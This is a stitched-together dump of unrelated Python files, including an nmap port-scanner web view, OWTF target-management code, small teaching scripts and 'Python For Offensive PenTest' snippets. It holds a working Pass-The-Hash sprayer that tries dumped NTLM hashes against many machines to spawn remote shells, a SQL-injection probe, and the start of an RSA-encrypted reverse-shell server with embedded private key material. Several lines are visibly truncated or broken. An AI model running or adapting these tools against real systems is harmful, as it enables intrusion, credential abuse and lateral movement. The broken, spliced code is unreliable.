29 values
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author : jeffzhang # @Time : 18-5-17 # @File : # @Desc : "" import threading import time from flask import Blueprint, render_template, request, redirect, url_for, jsonify from bson import ObjectId from lib.mongo_db import connectiondb, db_name_conf from fuxi.views.authenticate import login_check from fuxi.views.modules.port_scanner.nmap_scanner import nmap_scanner from instance import config_name port_scanner = Blueprint('port_scanner', __name__) config_db = db_name_conf()['config_db'] port_db = db_name_conf()['port_db'] # port_scanner @port_scanner.route('/port-scanner', methods=['GET', 'POST']) @login_check def port_view(): if request.method == "GET": if request.args.get("scan_id"): # default port scan result target_id = request.args.get("scan_id") db_course = connectiondb(port_db).find_one({"_id": ObjectId(target_id)}) host = db_course['host'] port = db_course['port'] if db_course['status'] == "Done": result = '\n'.join('%s' % c for c in db_course['detail']).replace(';', " ") else: result = "Scanning, Please wait..." return render_template('port-scanner.html', host=host, result=result, port=port) elif request.args.get("result"): # table view port scan result scan_id = request.args.get("result") db_course = connectiondb(port_db).find_one({"_id": ObjectId(scan_id)}) result = '\n'.join('%s' % c for c in db_course['detail']) return result elif request.args.get('delete'): # scan task delete scan_id = request.args.get("delete") connectiondb(port_db).delete_one({"_id": ObjectId(scan_id)}) return redirect(url_for('port_scanner.port_view')) # default scan view port_list = connectiondb(config_db).find_one({"config_name": config_name})['port_list'] ports = ','.join('%s' % port for port in port_list) return render_template('port-scanner.html', port_list=ports) else: # add scan if request.form.get('source') == "new_scan": target_val = request.form.get('target_val') arguments_val = int(request.form.get('arguments_val')) port_val = request.form.get('port_val') if len(port_val) > 0: if arguments_val == 0: arguments = "-sT -T4 -p " + port_val elif arguments_val == 1: arguments = "-sT -T4 --open -p " + port_val elif arguments_val == 2: arguments = "-sS -T4 -Pn -p " + port_val elif arguments_val == 3: arguments = "-sT -sV -O -A -p " + port_val else: arguments = "" # use default port else: if arguments_val == 0: arguments = "-sT -T4" elif arguments_val == 1: arguments = "-sT -T4 --open" elif arguments_val == 2: arguments = "-sS -T4 -Pn " elif arguments_val == 3: arguments = "-sT -sV -O -A" else: arguments = "" db_data = { "host": target_val, "status": "Preparation", 'port': port_val, "arguments": arguments, 'detail': "", 'date': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) } scan_id = connectiondb(port_db).insert_one(db_data).inserted_id t1 = threading.Thread(target=nmap_scanner, args=(target_val, arguments, scan_id)) t1.start() return jsonify({ "result": "success", "scan_id": str(scan_id), })
__author__ = 'Preston Miller & Chapin Bryce' import csv_writer import kml_writer import xlsx_writer
#!/usr/bin/python # # Simple script intended to perform Carpet Bombing against list # of provided machines using list of provided LSA Hashes (LM:NTLM). # The basic idea with Pass-The-Hash attack is to get One hash and use it # against One machine. There is a problem with this approach of not having information, # onto what machine we could have applied the hash. # To combat this issue - the below script was born. # # Requirements: # This script requires 'pth-winexe' utility (or winexe renamed to pth-winexe') be present # within system during script's invocation. In case this utility will not be present - # no further check upon ability to run commands from PTH attack - will be displayed. # Also, modules such as: # - impacket # # Notice: # This script is capable of verifying exploitability of only Windows boxes. In case # of other type of boxes (running Samba) pth-winexe will not yield satisfying results. # # Usage: # $ ./ machines.txt pwdump # # coded by: # Mariusz Banach, 2016 / mgeeky # version 0.2 # # Should be working on Windows boxes as well as on Linux ones. # from __future__ import print_function import os import sys import argparse import signal import logging import threading import subprocess import multiprocessing from termcolor import colored from functools import partial from multiprocessing.managers import BaseManager from impacket.dcerpc.v5 import transport WORKERS = multiprocessing.cpu_count() * 4 TIMEOUT = 10 OPTIONS = None LOCK = multiprocessing.Lock() def info(txt): with LOCK: print (txt) def success(txt): info(colored('[+] '+txt, 'green', attrs=['bold'])) def warning(txt): info(colored('[*] '+txt, 'yellow')) def verbose(txt): if OPTIONS.v: info(colored('[?] '+txt, 'white')) def err(txt): info(colored('[!] '+txt, 'red')) class Command(object): def __init__(self, cmd): self.cmd = cmd self.process = None self.output = '' self.error = '' verbose( '\tCalling: "%s"' % cmd) def get_output(self): return self.output, self.error def run(self, stdin, timeout): def target(): self.process = subprocess.Popen(self.cmd, shell=True, \ stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) self.output, self.error = self.process.communicate(stdin) thread = threading.Thread(target=target) thread.start() thread.join(timeout) if thread.is_alive(): self.process.terminate() thread.join() return False else: return True def init_worker(): # signal.signal(signal.SIGINT, signal.SIG_IGN) def cmd_exists(cmd): return"type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 def check_rce(host, username, hash, port): verbose('\tChecking whether provided hash can be used to PTH remote code execution') if cmd_exists('pth-winexe'): userswitch = '%s%%%s' % (username, hash) c = Command('pth-winexe -U %s //%s cmd' % (userswitch, host)) if'exit\n', TIMEOUT): pass else: verbose('\tPTH-Winexe had to be terminated.') out, error = c.get_output() if 'Microsoft' in out and '(C) Copyright' in out and '[Version' in out: return True else: errorm = error[error.find('NT_STATUS'):].strip() if not errorm.startswith('NT_STATUS'): if 'NT_STATUS' in error: errorm = error else: errorm = 'Unknown error' if OPTIONS.v: err('\tCould not spawn shell using PTH: ' + errorm) else: warning('\tPlease check above hash whether using it you can access writeable $IPC share to execute cmd.') return False def login(host, username, hash, port): stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % host rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) lmhash, nthash = hash.split(':') rpctransport.set_credentials(username, '', '', lmhash, nthash, None) dce = rpctransport.get_dce_rpc() try: dce.connect() return check_rce(host, username, hash, port) except Exception, e: raise e def correct_hash(hash): lmhash, nthash = hash.split(':') if '*' in lmhash: lmhash = '0' * 32 if '*' in nthash: nthash = '0' * 32 return lmhash + ':' + nthash def worker(stopevent, pwdump, machine): for user, hash in pwdump.items(): if stopevent.is_set(): break hash = correct_hash(hash) try: if login(machine, user, hash, OPTIONS.port): success('Pass-The-Hash with shell spawned: %s@%s (%s)' % (user, machine, hash)) else: if OPTIONS.v: warning('Connected using PTH but could\'nt spawn shell: %s@%s (%s)' % (user, machine, hash)) except Exception, e: verbose('Hash was not accepted: %s@%s (%s)\n\t%s' % (user, machine, hash, str(e))) def main(): global OPTIONS print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold'])) parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool') parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts') parser.add_argument('hashes', nargs='?', help='Specifies input file containing list of dumped hashes in pwdump format') parser.add_argument('-v', action='store_true', help='Verbose mode') parser.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar='smb port', help='Destination port used to connect into SMB Server') if len(sys.argv) < 3: parser.print_help() sys.exit(1) OPTIONS = parser.parse_args() machines = [x.strip() for x in open(OPTIONS.rhosts).readlines() ] rawpwdump = [x.strip() for x in open(OPTIONS.hashes).readlines() ] pwdump = {} for p in rawpwdump: try: user = p.split(':')[0] hash = p.split(':')[2] + ':' + p.split(':')[3] except: err('Supplied hashes file does not conform PWDUMP format!') err('\tIt must be like this: <user>:<id>:<lmhash>:<nthash>:...') sys.exit(1) pwdump[user] = hash warning('Testing %d hashes against %d machines. Resulting in total in %d PTH attempts\n' \ % (len(pwdump), len(machines), len(pwdump) * len(machines))) stopevent = multiprocessing.Manager().Event() try: pool = multiprocessing.Pool(WORKERS, init_worker) func = partial(worker, stopevent, pwdump) pool.map_async(func, machines) pool.close() pool.join() except KeyboardInterrupt: pool.terminate() pool.join() success('\nUser interrupted the script.') if __name__ == '__main__': main()
#! /usr/bin/python3.5 def main(): num_1=input("Enter First number : ") num_2=input("Enter Second number : ") sum_=num_1+num_2 print("Sum is : "+str(sum_)) print("Surprised !! ,input() returns String") print("Actuall sum : " +str(int(num_1)+int(num_2))) main()
""" ~~~~~~~~~~~~~~~~~~~~ """ import logging import os try: from urllib.parse import urlparse except ImportError: from urlparse import urlparse from owtf.db.session import get_count, get_scoped_session from owtf.lib.exceptions import ( DBIntegrityException, InvalidParameterType, InvalidTargetReference, UnresolvableTargetException, ) from owtf.models.command import Command from owtf.models.session import Session from import Target from owtf.managers.session import add_target_to_session, session_required from owtf.plugin.params import plugin_params from owtf.settings import OUTPUT_PATH from owtf.utils.file import ( cleanup_target_dirs, create_output_dir_target, get_target_dir, ) from owtf.utils.ip import get_ip_from_hostname, get_ips_from_hostname from owtf.utils.strings import str2bool, to_str TARGET_CONFIG = { "id": 0, "target_url": "", "host_name": "", "host_path": "", "url_scheme": "", "port_number": "", # In str form "host_ip": "", "alternative_ips": "", # str(list), so it can easily reversed using list(str) "ip_url": "", "top_domain": "", "top_url": "", "scope": True, "max_user_rank": -1, "max_owtf_rank": -1, } PATH_CONFIG = { "partial_url_output_path": "", "host_output": "", "port_output": "", "url_output": "", "plugin_output_dir": "", } def target_required(func): """ In order to use this decorator on a `method` there are two requirements + target_id must be a kwarg of the function + Core must be attached to the object at Core All this decorator does is check if a valid value is passed for target_id if not get the target_id from target manager and pass it """ def wrapped_function(*args, **kwargs): if "target_id" not in kwargs: kwargs["target_id"] = target_manager.get_target_id return func(*args, **kwargs) return wrapped_function @target_required def command_already_registered(session, original_command, target_id=None): """Checks if the command has already been registered :param original_command: Original command to check :type original_command: `dict` :param target_id: Target ID :type target_id: `int` :return: None :rtype: None """ from owtf.managers.poutput import plugin_output_exists if target_id is not None: target_manager.set_target(target_id) register_entry = session.query(Command).get(original_command) if register_entry: # If the command was completed and the plugin output to which it # is referring exists if register_entry.success: if plugin_output_exists( session, register_entry.plugin_key, register_entry.target_id ): return get_target_url_for_id(session, register_entry.target_id) else: Command.delete_cmd(session, original_command) return None else: # Command failed Command.delete_cmd(session, original_command) return get_target_url_for_id(session, register_entry.target_id) return None class TargetManager(object): # All these variables reflect to current target which is referenced by a unique ID target_id = None target_config = dict(TARGET_CONFIG) path_config = dict(PATH_CONFIG) def __init__(self): self.session = get_scoped_session() def set_target(self, target_id): """Set a target by ID :param target_id: target ID :type target_id: `int` :return: None :rtype: None """ try: self.target_id = target_id self.target_config = get_target_config_by_id(self.session, target_id) self.path_config = self.get_path_configs(self.target_config) except InvalidTargetReference: raise InvalidTargetReference( "0. Target doesn't exist: {!s}".format(target_id) ) def get_path_configs(self, target_config): """Get paths to output directories :param target_config: Target config :type target_config: `dict` :return: Path config :rtype: `dict` """ path_config = {} # Set the output directory. path_config["host_output"] = os.path.join(OUTPUT_PATH, target_config["host_ip"]) path_config["port_output"] = os.path.join( path_config["host_output"], target_config["port_number"] ) # Set the URL output directory (plugins will save their data here). path_config["url_output"] = os.path.join( get_target_dir(target_config["target_url"]) ) # Set the partial results path. path_config["partial_url_output_path"] = os.path.join( path_config["url_output"], "partial" ) return path_config @property def get_target_id(self): """Return target ID :return: target ID :rtype: `int` """ return self.target_id def get_val(self, key): """Get value of the key from target config :param key: Key :type key: `str` :return: Value :rtype: `str` #? """ return self.target_config[key] def get_target_url(self): """Return target URL :return: Target URL :rtype: `str` """ return self.get_val("target_url") def get_target_urls(self): """Return target URLs :return: List of target urls :rtype: `list` """ return get_all_targets(self.session, "target_url") @property def get_target_config(self): """Return target config :return: Target config :rtype: `dict` """ return self.target_config @property def get_path_config(self): """Return path config :return: Path config :rtype: `dict` """ return self.path_config def get_path(self, output_type): return self.path_config.get(output_type, None) def set_path(self, output_type, path): # Mainly used for setting output paths for individual plugins, which # need not be saved: plugin_output_dir. self.path_config[output_type] = path @session_required def add_target(session, target_url, session_id=None): """Adds a target to session :param target_url: Target url :type target_url: `str` :param session_id: session ID :type session_id: `int` :return: None :rtype: None """ if target_url not in get_all_targets(session, "target_url"): # A try-except can be used here, but then ip-resolution takes time # even if target is present target_config = derive_config_from_url(target_url) config_obj = Target(target_url=target_url) config_obj.host_name = target_config["host_name"] config_obj.host_path = target_config["host_path"] config_obj.url_scheme = target_config["url_scheme"] config_obj.port_number = target_config["port_number"] config_obj.host_ip = target_config["host_ip"] config_obj.alternative_ips = str(target_config["alternative_ips"]) config_obj.ip_url = target_config["ip_url"] config_obj.top_domain = target_config["top_domain"] config_obj.top_url = target_config["top_url"] session.add(config_obj) config_obj.sessions.append(session.query(Session).get(session_id)) session.commit() target_id = create_missing_dirs_target(target_url) target_manager.set_target(target_id) else: session_obj = session.query(Session).get(session_id) target_obj = session.query(Target).filter_by(target_url=target_url).one() if session_obj in target_obj.sessions: raise DBIntegrityException( "{!s} already present in Target DB & session".format(target_url) ) else: add_target_to_session(session,, @session_required def add_targets(session, target_urls, session_id=None): """Add multiple targets :param target_urls: List of target urls :type target_urls: `list` :param session_id: session ID :type session_id: `int` :return: None :rtype: None """ for target_url in target_urls: add_target(session, to_str(target_url), session_id=session_id) def update_target(session, data_dict, target_url=None, id=None): """Update a target in the DB :param data_dict: Modified data :type data_dict: `dict` :param target_url: Target url :type target_url: `str` :param id: Target ID :type id: `int` :return: None :rtype: None """ target_obj = None if id: target_obj = session.query(Target).get(id) if target_url: target_obj = session.query(Target).filter_by(target_url=target_url).one() if not target_obj: raise InvalidTargetReference( "2. Target doesn't exist: {!s}".format(id) if id else str(target_url) ) # TODO: Updating all related attributes when one attribute is changed if data_dict.get("scope", None) is not None: target_obj.scope = str2bool(data_dict.get("scope", None)) session.commit() def delete_target(session, target_url=None, id=None): """Delete a target from DB :param target_url: target URL :type target_url: `str` :param id: Target ID :type id: `int` :return: None :rtype: None """ target_obj = None if id: target_obj = session.query(Target).get(id) if target_url: target_obj = session.query(Target).filter_by(target_url=target_url).one() if not target_obj: raise InvalidTargetReference( "3. Target doesn't exist: {!s}".format(id) if id else str(target_url) ) if target_obj: target_url = target_obj.target_url session.delete(target_obj) session.commit() cleanup_target_dirs(target_url) def create_missing_dirs_target(target_url): """Creates missing output dirs for target :param target_url: Target URL :type target_url: `str` :return: None :rtype: None """ create_output_dir_target(target_url) def get_target_url_for_id(session, id): """Get target URL by target ID :param id: target ID :type id: `int` :return: Target url :rtype: `str` """ target_obj = session.query(Target).get(id) if not target_obj:"Failing with ID: %s" % str(id)) raise InvalidTargetReference("1. Target doesn't exist with ID: {!s}".format(id)) return target_obj.target_url def get_target_config_by_id(session, id): """Get target config by id :param id: Target id :type id: `int` :return: Config dict :rtype: `dict` """ target_obj = session.query(Target).get(id) if not target_obj: raise InvalidTargetReference("5. Target doesn't exist: {!s}".format(id)) return get_target_config_dict(target_obj) def target_gen_query(session, filter_data, session_id, for_stats=False): """Generate query :param filter_data: Filter data :type filter_data: `dict` :param session_id: session ID :type session_id: `int` :param for_stats: true/false :type for_stats: `bool` :return: :rtype: """ query = session.query(Target).filter(Target.sessions.any(id=session_id)) if filter_data.get("search") is not None: if filter_data.get("target_url", None): if isinstance(filter_data.get("target_url"), list): filter_data["target_url"] = filter_data["target_url"][0] query = query.filter("%%{!s}%%".format(filter_data["target_url"])) ) else: if filter_data.get("target_url", None): if isinstance(filter_data["target_url"], str): query = query.filter_by(target_url=filter_data["target_url"]) if isinstance(filter_data["target_url"], list): query = query.filter( Target.target_url.in_(filter_data.get("target_url")) ) if filter_data.get("host_ip", None): if isinstance(filter_data["host_ip"], str): query = query.filter_by(host_ip=filter_data["host_ip"]) if isinstance(filter_data["host_ip"], list): query = query.filter(Target.host_ip.in_(filter_data.get("host_ip"))) if filter_data.get("scope", None): filter_data["scope"] = filter_data["scope"][0] query = query.filter_by(scope=str2bool(filter_data.get("scope"))) if filter_data.get("host_name", None): if isinstance(filter_data["host_name"], str): query = query.filter_by(host_name=filter_data["host_name"]) if isinstance(filter_data["host_name"], list): query = query.filter(Target.host_name.in_(filter_data.get("host_name"))) if filter_data.get("id", None): if isinstance(filter_data["id"], str): query = query.filter_by(id=filter_data["id"]) if isinstance(filter_data["id"], list): query = query.filter("id"))) # This will allow new targets to be at the start query = query.order_by( if not for_stats: # query for stats shouldn't have limit and offset try: if filter_data.get("offset", None): if isinstance(filter_data.get("offset"), list): filter_data["offset"] = filter_data["offset"][0] query = query.offset(int(filter_data["offset"])) if filter_data.get("limit", None): if isinstance(filter_data.get("limit"), list): filter_data["limit"] = filter_data["limit"][0] if int(filter_data["limit"]) != -1: query = query.limit(int(filter_data["limit"])) except ValueError: raise InvalidParameterType( "Invalid parameter type for target db for id[lt] or id[gt]" ) return query @session_required def search_target_configs(session, filter_data=None, session_id=None): """Three things needed + Total number of targets + Filtered target dicts + Filtered number of targets :param filter_data: Filter data :type filter_data: `dict` :param session_id: session id :type session_id: `int` :return: results :rtype: `dict` """ total = get_count(session.query(Target).filter(Target.sessions.any(id=session_id))) filtered_target_objs = target_gen_query(session, filter_data, session_id).all() filtered_number = get_count( target_gen_query(session, filter_data, session_id, for_stats=True) ) results = { "records_total": total, "records_filtered": filtered_number, "data": get_target_configs(filtered_target_objs), } return results @session_required def get_target_config_dicts(session, filter_data=None, session_id=None): """Get list of target config dicts :param filter_data: Filter criteria :type filter_data: `dict` :param session_id: session ID :type session_id: `int` :return: List of target config dicts :rtype: `list` """ if filter_data is None: filter_data = {} target_obj_list = target_gen_query( session=session, filter_data=filter_data, session_id=session_id ).all() return get_target_configs(target_obj_list) def get_target_config_dict(target_obj): """Gets target config as a dict from object :param target_obj: target object :type target_obj: :return: Target config :rtype: `dict` """ target_config = dict(TARGET_CONFIG) if target_obj: for key in list(TARGET_CONFIG.keys()): target_config[key] = getattr(target_obj, key) return target_config return None def get_target_configs(target_obj_list): """Get target list of configs :param target_obj_list: Target object list :type target_obj_list: `list` :return: List of target configs :rtype: `list` """ target_configs = [] for target_obj in target_obj_list: target_configs.append(get_target_config_dict(target_obj)) return target_configs def get_targets_as_list(key_list): """Get everything as list :param key_list: Target key list :type key_list: `list` :return: Values list :rtype: `list` """ session = get_scoped_session() values = [] for key in key_list: values.append(get_all_targets(session, key)) return values def get_all_targets(session, key): """Get all targets by key :param key: Target key :type key: `str` :return: :rtype: """ results = session.query(getattr(Target, key.lower())).all() results = [result[0] for result in results] return results def get_all_in_scope(key): """Get all targets in scope by key :param key: Key :type key: `str` :return: List of target keys :rtype: `list` """ session = get_scoped_session() results = session.query(getattr(Target, key.lower())).filter_by(scope=True).all() results = [result[0] for result in results] return results def is_url_in_scope(url): """To avoid following links to other domains. :param url: URL to check :type url: `str` :return: True if in scope :rtype: `bool` """ parsed_url = urlparse(url) # Get all known Host Names in Scope. for host_name in get_all_in_scope(key="host_name"): if parsed_url.hostname == host_name: return True return False def load_targets(session, options): """Load targets into the DB :param options: User supplied arguments :type options: `dict` :return: Added targets :rtype: `list` """ scope = options["scope"] if options["plugin_group"] == "auxiliary": scope = get_aux_target() added_targets = [] for target in scope: try: add_target(session=session, target_url=target) added_targets.append(target) except DBIntegrityException: logging.warning("%s already exists in DB", target) added_targets.append(target) except UnresolvableTargetException as e: logging.error("%s", e.parameter) return added_targets def get_aux_target(): """This function returns the target for auxiliary plugins from the parameters provided :param options: User supplied arguments :type options: `dict` :return: List of targets for aux plugins :rtype: `list` """ # targets can be given by different params depending on the aux plugin we are running # so "target_params" is a list of possible parameters by which user can give target target_params = ["RHOST", "TARGET", "SMB_HOST", "BASE_URL", "SMTP_HOST"] targets = None if plugin_params.process_args(): for param in target_params: if param in plugin_params.args: targets = plugin_params.args[param] break # it will capture only the first one matched repeat_delim = "," if targets is None: logging.error( "Aux target not found! See your plugin accepted parameters in ./plugins/ folder" ) return [] if "REPEAT_DELIM" in plugin_params.args: repeat_delim = plugin_params.args["REPEAT_DELIM"] return targets.split(repeat_delim) else: return [] @session_required def get_targets_by_severity_count(session, session_id=None): """Get targets by severity count :param session_id: session ID :type session_id: `int` :return: data :rtype: `dict` """ filtered_severity_objs = [] # "not ranked" = gray, "passing" = light green, "info" = light sky blue, "low" = blue, medium = yellow, # high = red, critical = dark purple severity_frequency = [ {"id": 0, "label": "Not Ranked", "value": 0, "color": "#A9A9A9"}, {"id": 1, "label": "Passing", "value": 0, "color": "#32CD32"}, {"id": 2, "label": "Info", "value": 0, "color": "#b1d9f4"}, {"id": 3, "label": "Low", "value": 0, "color": "#337ab7"}, {"id": 4, "label": "Medium", "value": 0, "color": "#ffcc00"}, {"id": 5, "label": "High", "value": 0, "color": "#c12e2a"}, {"id": 6, "label": "Critical", "value": 0, "color": "#800080"}, ] total = session.query(Target).filter(Target.sessions.any(id=session_id)).count() target_objs = session.query(Target).filter(Target.sessions.any(id=session_id)).all() for target_obj in target_objs: if target_obj.max_user_rank != -1: severity_frequency[target_obj.max_user_rank + 1]["value"] += 100 / total else: severity_frequency[target_obj.max_owtf_rank + 1]["value"] += 100 / total for severity in severity_frequency: if severity["value"] != 0: filtered_severity_objs.append(severity) return {"data": filtered_severity_objs} def derive_config_from_url(target_url): """Automatically find target information based on target name. .. note:: If target does not start with 'http' or 'https', then it is considered as a network target. :param target_URL: Target url supplied :type target_URL: `str` :return: Target config dictionary :rtype: `dict` """ target_config = dict(TARGET_CONFIG) target_config["target_url"] = target_url try: parsed_url = urlparse(target_url) if ( not parsed_url.hostname and not parsed_url.path ): # No hostname and no path, urlparse failed. raise ValueError except ValueError: # Occurs sometimes when parsing invalid IPv6 host for instance raise UnresolvableTargetException("Invalid hostname '{!s}'".format(target_url)) host = parsed_url.hostname if not host: # Happens when target is an IP (e.g. host = parsed_url.path # Use the path as host (e.g. => host = '' and path = '') host_path = host else: host_path = parsed_url.hostname + parsed_url.path url_scheme = parsed_url.scheme protocol = parsed_url.scheme if parsed_url.port is None: # Port is blank: Derive from scheme (default port set to 80). try: host, port = host.rsplit(":") except ValueError: # Raised when target doesn't contain the port (e.g. port = "80" if "https" == url_scheme: port = "443" else: # Port found by urlparse. port = str(parsed_url.port) # Needed for google resource search. target_config["host_path"] = host_path # Some tools need this! target_config["url_scheme"] = url_scheme # Some tools need this! target_config["port_number"] = port # Set the top URL. target_config["host_name"] = host host_ip = get_ip_from_hostname(host) host_ips = get_ips_from_hostname(host) target_config["host_ip"] = host_ip target_config["alternative_ips"] = host_ips ip_url = target_config["target_url"].replace(host, host_ip) target_config["ip_url"] = ip_url target_config["top_domain"] = target_config["host_name"] hostname_chunks = target_config["host_name"].split(".") if target_config["target_url"].startswith( ("http", "https") ): # target considered as hostname (web plugins) if not target_config["host_name"] in target_config["alternative_ips"]: target_config["top_domain"] = ".".join(hostname_chunks[1:]) # Set the top URL (get "" from ""). target_config["top_url"] = "{0}://{1}:{2}".format(protocol, host, port) else: # target considered as IP (net plugins) target_config["top_domain"] = "" target_config["top_url"] = "" return target_config # Define the service target_manager = TargetManager()
''' Caution -------- Using this script for any malicious purpose is prohibited and against the law. Please read Google terms and conditions carefully. Use it on your own risk. ''' # Python For Offensive PenTest # Interacting with Google Forms import requests # To install requests library, just type on the CMD: pip install requests url = '' # please replace the URL with your own google form :D ''' notice that i added /formResponse to the end of the URL and this is inherited from the page HTML source code, as we can see below, the HTML form action contains /formResponse when method POST is used to send the user data so we have to add this part when we automate the data submission <div class="ss-form"><form action="" method="POST" id="ss-form" target="_self" onsubmit=""><ol role="list" class="ss-question-list" style="padding-left: 0"> ''' form_data = {'entry.1542374001':'Hello from Python'} ''' the textarea form name [which is entry.1301128713] can be taken from the HTML source code as you can see from the below line, please check the video for more info. <textarea name="entry.1301128713" rows="8" cols="0" class="ss-q-long" id="entry_1301128713" dir="auto" aria-label="Isn&#39;t Python awesome?? "></textarea> Note: the key (entry.1301128713) will vary on your google form, make sure you change it. ''' r =, data=form_data) # Submitting form-encoded data in requests:- #
import sys import time from PyQt4.QtCore import * from PyQt4.QtGui import * from PyQt4.QtWebKit import * class Screenshot(QWebView): def __init__(self): = QApplication(sys.argv) QWebView.__init__(self) self._loaded = False self.loadFinished.connect(self._loadFinished) def wait_load(self, delay=0): while not self._loaded: time.sleep(delay) self._loaded = False def _loadFinished(self, result): self._loaded = True def get_image(self, url): self.load(QUrl(url)) self.wait_load() frame = image = QImage(, QImage.Format_ARGB32) painter = QPainter(image) frame.render(painter) painter.end() return image s = Screenshot() image = s.get_image('')'website.png')
import sys def main(): """ The main function uses sys.argv list to print any user supplied input. :return: Nothing. """ args = sys.argv print 'Script:', args[0] args.pop(0) for i, argument in enumerate(sys.argv): print 'Argument {}: {}'.format(i, argument) print 'Type: {}'.format(type(argument)) if __name__ == '__main__': main()
import requests url = "" initial = "'" print "Testing "+ url first = if "mysql" in first.text.lower(): print "Injectable MySQL detected" elif "native client" in first.text.lower(): print "Injectable MSSQL detected" elif "syntax error" in first.text.lower(): print "Injectable PostGRES detected" elif "ORA" in first.text.lower(): print "Injectable Oracle detected" else: print "Not Injectable :( "
# Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # # Download Pycrypto source # # For Kali, after extract the tar file, invoke "python install" # Generate Keys from Crypto.PublicKey import RSA new_key = RSA.generate(4096 ) # generate RSA key that 4096 bits long #Export the Key in PEM format, the PEM extension contains ASCII encoding public_key = new_key.publickey().exportKey("PEM") private_key = new_key.exportKey("PEM") print private_key print public_key
# Python For Offensive PenTest # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7 # # Download Pycrypto source # # For Kali, after extract the tar file, invoke "python install" # RSA - Server- TCP Reverse Shell import socket from Crypto.PublicKey import RSA def encrypt(message): #Remember that here we define the target's public key publickey ='''-----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAms5mJkSBV9C4iPlyxugD WyaryfJE/e4Z2AvgY9YsNWZasTPQ9gCVoGrfd3I9Efmd2wHJVnBxjL0aenjFV1fa 9hHINMOO0JRQo+2umyg+QMd+EdglA9MWaXUgNb8ADa+zKCT+0VbF92iAlAmAFii6 aY4jkVKSUBVGkmn94WNIYSVzHNSr5JcaPEthRpAAJE2lwjA4OIqpKUDnK/0rzlNl QkSlBbN7ztEtfzjzI3dJo+i/VsOaS8LHfsk3nKX2GU95AM3LhpF2cMRgIJJCSU2s B6Hq+TiZFh9bWyceRPjvzJh3LZ2FJUh99kJ28ykIph9XjGMgXZVFmPOFYM7zFKYN TPgZbO5RCj1LJVJqGlXThJ8PA+7rWwquDgTPMkiH4wP59K2Dz122FYoBDZ8KgP6H XzcG18q5o/KxONO0whnOSFJQm2XnnbtM8g2DM+x6sYTWf+v75bMAdfNuzBeFNIxA 3FGpzaad+Dv1VNtDW6za5w+tpUjTnUrHyYGsPMo3+hXknhvFL9cmAktlYR+l3qXx xRK1/zgPexfBTpu7i1qUZilEq5pej/3s0mTtmP7l1MMFU4e7xiBPTzX9QYtvruI5 pDbgT8tFmwhi64wm0mkagNiGDnV1vlHQs6s2rP6lbpvnL7GDOhgwgj1OGV3c13n3 Va82hzcUKsKRb4XKLUvTSaECAwEAAQ== -----END PUBLIC KEY-----''' encryptor = RSA.importKey(publickey) global encriptedData encriptedData=encryptor.encrypt(message, 0) return encriptedData[0] def decrypt(cipher): #Remember that here we define our (the server's) private key privatekey = '''-----BEGIN RSA PRIVATE KEY----- MIIJJwIBAAKCAgEAlkZ3S9jWwHcnBo5bVtL3rr/pI0rsQQ+68uMgkxUy/79tLGoY K1V6QikMwdtMub3etya8/FfnbhMjkq5qwkfI99C5lj+33uWf1VpOJ9zKWUbRzTAA ikVsaP998jvIbRBIm5UK24+oAl6Y3D8/m/0zI56udJUZlO5IRcdE1AmSCCzktF6g WD/o7RK3RBhG6VJXu9orf+ghdihR1zRsK7nRRfoJDBqoOj+0JoHJEYPD4aMT1XGf 2cVLwuQGakTH67GcTq5Y+/7oEsh1kJFThm7MC+tg+R2352azYgZ2qNiuasGtFHnd 4ikNRzYZm7CeOBCQ8/8YwPMZTolTkHe2UukoPK8SSj6D/Lg5Q+gqiDy1FvMWvAER 2rxQYkRlTomkLvUU1iVVCmg3VViF8WGGgVoo0AhxmsbJ4HM2NsAYZq+cfseVRNLL 1MHHPENb9fO++bDJREoLBvme5Zxreq9JQ8p6TlUNk4NVIQ8/Kq0G+Ja6G/mLakmT ld0a+RTtGy9gIwDdcFLrbOeNbUyb0vkyK4OSwUKb0OcurPoF7AGYs/E2zeWIxRDF XPaQ6JbUoih8kzhjen8sq0LN03oHLFy/2csHjyZi0/2lVn1GRFrucHrdLdba+ZcC J9B+JAw2aLOsnzGFPidLefkOTIRFFz/g5kVYcmShcbYGnjhH3oM1khkomVkCAwEA AQKCAgAh9hzh1Eh8SLFWJvf3gEgfgxmSM01/SqnKWJA1DVZwO/fVUMjTikbOCu7q JMCLPaDGrYeKU+dmlga1EJvp+kUt1EsM7KuGQUjE89qz4Y8NbBbgE1gb56KffBYf l2ktVL/EAYPpqOakWnKbW+PpQei7xRHSIRwd71gABQ/GB7+r/1FUfgoox5DBezhV uFLWShivyJeKGZDuXiBYzW0g2Ka19NL0nFWmjF0PUsd5INk09iD2XO5uTctYaSYW ACNaXdJgacCMeshB7nG7UUyaFhIhI3nP8upr7mbd4W4RrJ6GW+zcssn1Yaexj0Vs TRcEvqGzstQKTyZJ/HkZLiTTSgQgkepLVbJFJlXvgWhsRAsm34uvH0IRFesMAtx5 Sf8zO9m8SFHoZ6DmHqk0yR7jz46aCv+9pSYBb1ZyUnJi6/gBDZ/vQ49fofjIRSOD Jqt6hSG/ci0xzPDzmUMIpn71fHJextIjizgW9geZGOLgc4ZywI6mzYoLhGbxNoZ5 9yIcbwnfIHbK8jSC72N6tWgACxa5xHW14q9tlV/JxuI6AOroWWq74d5v9XNfP6KX fcOQcfAoyHNNBIlJXwYhxayOmPewJFVlFG6gdZYSKc2c575/4cFFI5/IQbW/+1cd IqEpVv1i1XzeX8zBLR5sd7NVpZkSOaeDEBfe9PexPuus7g4yfQKCAQEAt3nqQRU+ 8xvDgaPXbC2MGOV9ZHYt7f0oDwH5TDAKo3nzWmcwuZx2MWb65byur2Es3UxvkT3G 